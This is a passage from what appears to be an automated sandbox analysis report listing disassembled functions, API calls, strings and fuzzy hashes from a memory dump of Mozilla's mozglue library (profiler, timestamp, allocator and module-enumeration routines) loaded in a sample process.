                                                                    • Part of subcall function 6C90DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C8D4A68), ref: 6C90DEB8
                                                                    • Part of subcall function 6C90DE60: free.MOZGLUE(00000000,?,6C8D4A68), ref: 6C90DEFE
                                                                    • Part of subcall function 6C90DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C90DF38
                                                                    • Part of subcall function 6C8FCBE8: GetCurrentProcess.KERNEL32(?,6C8C31A7), ref: 6C8FCBF1
                                                                    • Part of subcall function 6C8FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8C31A7), ref: 6C8FCBFA
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90EF1E
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C90EF2B
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C90EF59
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90EFB0
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C90EFBD
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C90EFE1
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90EFF8
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C90F000
                                                                    • Part of subcall function 6C9094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9094EE
                                                                    • Part of subcall function 6C9094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C909508
                                                                  • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C90F02F
                                                                    • Part of subcall function 6C90F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C90F09B
                                                                    • Part of subcall function 6C90F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C90F0AC
                                                                    • Part of subcall function 6C90F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C90F0BE
                                                                  Strings
                                                                  • [I %d/%d] profiler_stop, xrefs: 6C90EED7
                                                                  • [I %d/%d] profiler_pause, xrefs: 6C90F008
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                  • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                  • API String ID: 16519850-1833026159
                                                                  • Opcode ID: 47b8011962afee53ed7ef126cf1c0b1327395ab7a6b9db05f813fd048cb77b60
                                                                  • Instruction ID: 86f594a830a3b4a2157fd703d75475621c52301223cc03229f89dec2f31ca84f
                                                                  • Opcode Fuzzy Hash: 47b8011962afee53ed7ef126cf1c0b1327395ab7a6b9db05f813fd048cb77b60
                                                                  • Instruction Fuzzy Hash: 5C51C6757086159FDB107B64D40CB9A7778EB8636CF20C569E95983F41DB70C40487E6
                                                                  APIs
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C94E804), ref: 6C8FD047
                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C8FD093
                                                                  • __Init_thread_footer.LIBCMT ref: 6C8FD0A6
                                                                  • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C94E810,00000040), ref: 6C8FD0D0
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C94E7B8,00001388), ref: 6C8FD147
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C94E744,00001388), ref: 6C8FD162
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C94E784,00001388), ref: 6C8FD18D
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C94E7DC,00001388), ref: 6C8FD1B1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
                                                                  • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
                                                                  • API String ID: 2957312145-326518326
                                                                  • Opcode ID: 5545815780d37c11ded18814ec5e36fae270f11788db27f360405b6f68929e54
                                                                  • Instruction ID: fca772d97226330dfe6efbb92a7d09bba8aecd8ebe7e8dce81455acac936ca21
                                                                  • Opcode Fuzzy Hash: 5545815780d37c11ded18814ec5e36fae270f11788db27f360405b6f68929e54
                                                                  • Instruction Fuzzy Hash: 9C810A70B082049BEB20EF68CA54B69B7B5FB4675CF20896AE61197B40D771D806CBD1
                                                                  APIs
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8D5E9D
                                                                    • Part of subcall function 6C8E5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C8E56EE,?,00000001), ref: 6C8E5B85
                                                                    • Part of subcall function 6C8E5B50: EnterCriticalSection.KERNEL32(6C94F688,?,?,?,6C8E56EE,?,00000001), ref: 6C8E5B90
                                                                    • Part of subcall function 6C8E5B50: LeaveCriticalSection.KERNEL32(6C94F688,?,?,?,6C8E56EE,?,00000001), ref: 6C8E5BD8
                                                                    • Part of subcall function 6C8E5B50: GetTickCount64.KERNEL32 ref: 6C8E5BE4
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C8D5EAB
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C8D5EB8
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C8D5ECF
                                                                  • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C8D6017
                                                                    • Part of subcall function 6C8C4310: moz_xmalloc.MOZGLUE(00000010,?,6C8C42D2), ref: 6C8C436A
                                                                    • Part of subcall function 6C8C4310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C8C42D2), ref: 6C8C4387
                                                                  • moz_xmalloc.MOZGLUE(00000004), ref: 6C8D5F47
                                                                  • GetCurrentProcess.KERNEL32 ref: 6C8D5F53
                                                                  • GetCurrentThread.KERNEL32 ref: 6C8D5F5C
                                                                  • GetCurrentProcess.KERNEL32 ref: 6C8D5F66
                                                                  • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C8D5F7E
                                                                  • moz_xmalloc.MOZGLUE(00000024), ref: 6C8D5F27
                                                                    • Part of subcall function 6C8DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C8DCAA2
                                                                  • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8D55E1), ref: 6C8D5E8C
                                                                    • Part of subcall function 6C8DCA10: malloc.MOZGLUE(?), ref: 6C8DCA26
                                                                  • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8D55E1), ref: 6C8D605D
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8D55E1), ref: 6C8D60CC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                  • String ID: GeckoMain
                                                                  • API String ID: 3711609982-966795396
                                                                  • Opcode ID: 74a299124a0e090bfaed8aeff7acefcfe3f6d930f1935a7cd82d7094ae4937e2
                                                                  • Instruction ID: 58c6e04fb72315321e5510273833aac66e1a2e2742d9e7937cb99254edb39322
                                                                  • Opcode Fuzzy Hash: 74a299124a0e090bfaed8aeff7acefcfe3f6d930f1935a7cd82d7094ae4937e2
                                                                  • Instruction Fuzzy Hash: 5771C4B06097419FD720DF28C580A6ABBF0FF99308F154D6DE4868BB52D731E948CB92
                                                                  APIs
                                                                    • Part of subcall function 6C8C31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C8C3217
                                                                    • Part of subcall function 6C8C31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C8C3236
                                                                    • Part of subcall function 6C8C31C0: FreeLibrary.KERNEL32 ref: 6C8C324B
                                                                    • Part of subcall function 6C8C31C0: __Init_thread_footer.LIBCMT ref: 6C8C3260
                                                                    • Part of subcall function 6C8C31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C8C327F
                                                                    • Part of subcall function 6C8C31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8C328E
                                                                    • Part of subcall function 6C8C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C8C32AB
                                                                    • Part of subcall function 6C8C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C8C32D1
                                                                    • Part of subcall function 6C8C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C8C32E5
                                                                    • Part of subcall function 6C8C31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C8C32F7
                                                                  • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C8D9675
                                                                  • __Init_thread_footer.LIBCMT ref: 6C8D9697
                                                                  • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C8D96E8
                                                                  • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C8D9707
                                                                  • __Init_thread_footer.LIBCMT ref: 6C8D971F
                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C8D9773
                                                                  • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C8D97B7
                                                                  • FreeLibrary.KERNEL32 ref: 6C8D97D0
                                                                  • FreeLibrary.KERNEL32 ref: 6C8D97EB
                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C8D9824
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                  • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                  • API String ID: 3361784254-3880535382
                                                                  • Opcode ID: 1ffe603e319f53efdf30b578058f41972a74f22c05ad26c18e477cdacbd8dfae
                                                                  • Instruction ID: f9247c1943d5e11207d5e969be1db13ce04135a8a7b35a4e1c6c6873213234d9
                                                                  • Opcode Fuzzy Hash: 1ffe603e319f53efdf30b578058f41972a74f22c05ad26c18e477cdacbd8dfae
                                                                  • Instruction Fuzzy Hash: 6B610971608206EFDF10EF68DA94B9A7BB0EB4A71CF21C929E91583740DB34E844CB91
                                                                  APIs
                                                                  • K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C8D8007
                                                                  • moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C8D801D
                                                                    • Part of subcall function 6C8DCA10: malloc.MOZGLUE(?), ref: 6C8DCA26
                                                                  • memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C8D802B
                                                                  • K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C8D803D
                                                                  • moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C8D808D
                                                                    • Part of subcall function 6C8DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C8DCAA2
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C8D809B
                                                                  • GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C8D80B9
                                                                  • moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C8D80DF
                                                                  • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D80ED
                                                                  • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D80FB
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D810D
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C8D8133
                                                                  • free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C8D8149
                                                                  • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C8D8167
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C8D817C
                                                                  • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D8199
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
                                                                  • String ID:
                                                                  • API String ID: 2721933968-0
                                                                  • Opcode ID: bca0ced355b5248954394fe5ab0e84b6c4e4e31e92877f29f66cd687ba4391fd
                                                                  • Instruction ID: 6f268bb25ad5ecb9b9e7a4dd57881132630c6a378b30857e907d20f33d8ecbf5
                                                                  • Opcode Fuzzy Hash: bca0ced355b5248954394fe5ab0e84b6c4e4e31e92877f29f66cd687ba4391fd
                                                                  • Instruction Fuzzy Hash: FA51B3B2E002149BDF10DBA9DD84AEFB7B9AF59224F250525E815E7741E730ED08CBA1
                                                                  APIs
                                                                  • InitializeCriticalSection.KERNEL32(6C94F618), ref: 6C926694
                                                                  • GetThreadId.KERNEL32(?), ref: 6C9266B1
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9266B9
                                                                  • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C9266E1
                                                                  • EnterCriticalSection.KERNEL32(6C94F618), ref: 6C926734
                                                                  • GetCurrentProcess.KERNEL32 ref: 6C92673A
                                                                  • LeaveCriticalSection.KERNEL32(6C94F618), ref: 6C92676C
                                                                  • GetCurrentThread.KERNEL32 ref: 6C9267FC
                                                                  • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C926868
                                                                  • RtlCaptureContext.NTDLL ref: 6C92687F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                  • String ID: WalkStack64
                                                                  • API String ID: 2357170935-3499369396
                                                                  • Opcode ID: 19f90f6da2adfda93a231bfc781ee3c0849329b096061572d2a28f36f755a50d
                                                                  • Instruction ID: 984fcf08e55ab65ace84f2107db72d88da5bc478f33868020601ef34607bd350
                                                                  • Opcode Fuzzy Hash: 19f90f6da2adfda93a231bfc781ee3c0849329b096061572d2a28f36f755a50d
                                                                  • Instruction Fuzzy Hash: D951A971A19701AFD711DF24D844A5FBBF8BF89718F10892DF99887A40D774E908CB92
                                                                  APIs
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C8D4A68), ref: 6C90945E
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C909470
                                                                    • Part of subcall function 6C909420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C909482
                                                                    • Part of subcall function 6C909420: __Init_thread_footer.LIBCMT ref: 6C90949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90DE73
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90DF7D
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C90DF8A
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C90DFC9
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90DFF7
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C90E000
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C8D4A68), ref: 6C90DE7B
                                                                    • Part of subcall function 6C9094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9094EE
                                                                    • Part of subcall function 6C9094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C909508
                                                                    • Part of subcall function 6C8FCBE8: GetCurrentProcess.KERNEL32(?,6C8C31A7), ref: 6C8FCBF1
                                                                    • Part of subcall function 6C8FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8C31A7), ref: 6C8FCBFA
                                                                  • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C8D4A68), ref: 6C90DEB8
                                                                  • free.MOZGLUE(00000000,?,6C8D4A68), ref: 6C90DEFE
                                                                  • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C90DF38
                                                                  Strings
                                                                  • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C90E00E
                                                                  • [I %d/%d] locked_profiler_stop, xrefs: 6C90DE83
                                                                  • <none>, xrefs: 6C90DFD7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                  • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                  • API String ID: 1281939033-809102171
                                                                  • Opcode ID: a34432d22e246a16ed40e8bd2c907852dba4b621e3d2037e9e0c08d5dd57bb7d
                                                                  • Instruction ID: 2241d5e10b8f630e6c7ddca437833e7f513b6d826ea0b88dba92b3da3e7a80c4
                                                                  • Opcode Fuzzy Hash: a34432d22e246a16ed40e8bd2c907852dba4b621e3d2037e9e0c08d5dd57bb7d
                                                                  • Instruction Fuzzy Hash: 9A4117727156119BDB10AF69D808BAE7779EF9631CF24802DEA0987F01DB30D815CBE2
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C91D4F0
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C91D4FC
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C91D52A
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C91D530
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C91D53F
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C91D55F
                                                                  • free.MOZGLUE(00000000), ref: 6C91D585
                                                                  • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C91D5D3
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C91D5F9
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C91D605
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C91D652
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C91D658
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C91D667
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C91D6A2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                  • String ID:
                                                                  • API String ID: 2206442479-0
                                                                  • Opcode ID: ab4704f00bb1c3980065141d6ad13af77eeef78e1a22a52ce03015162e717361
                                                                  • Instruction ID: 0c82541b792df4aae49b06001a35307ab12f47cfba219088a9e37b92639f7c0b
                                                                  • Opcode Fuzzy Hash: ab4704f00bb1c3980065141d6ad13af77eeef78e1a22a52ce03015162e717361
                                                                  • Instruction Fuzzy Hash: BA513C75608B09DFC704DF35C484A9ABBB4FF89358F108A2EE95A87B11DB30E945CB91
                                                                  APIs
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C8E56D1
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8E56E9
                                                                  • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C8E56F1
                                                                  • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C8E5744
                                                                  • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C8E57BC
                                                                  • GetTickCount64.KERNEL32 ref: 6C8E58CB
                                                                  • EnterCriticalSection.KERNEL32(6C94F688), ref: 6C8E58F3
                                                                  • __aulldiv.LIBCMT ref: 6C8E5945
                                                                  • LeaveCriticalSection.KERNEL32(6C94F688), ref: 6C8E59B2
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C94F638,?,?,?,?), ref: 6C8E59E9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                  • String ID: MOZ_APP_RESTART
                                                                  • API String ID: 2752551254-2657566371
                                                                  • Opcode ID: aa26c0e5176b9156cd29b6b4a0d88a3b53710da338e9a1cde46351d35da2fb81
                                                                  • Instruction ID: 8a994fe6c0c778985840a7727b4ade7087f7e15dccd816431b8378a55caa15c6
                                                                  • Opcode Fuzzy Hash: aa26c0e5176b9156cd29b6b4a0d88a3b53710da338e9a1cde46351d35da2fb81
                                                                  • Instruction Fuzzy Hash: EDC18C31A0D7559FDB15EF28C54066AB7F1FFCA318F158A1DE8C897660D730A885CB82
                                                                  APIs
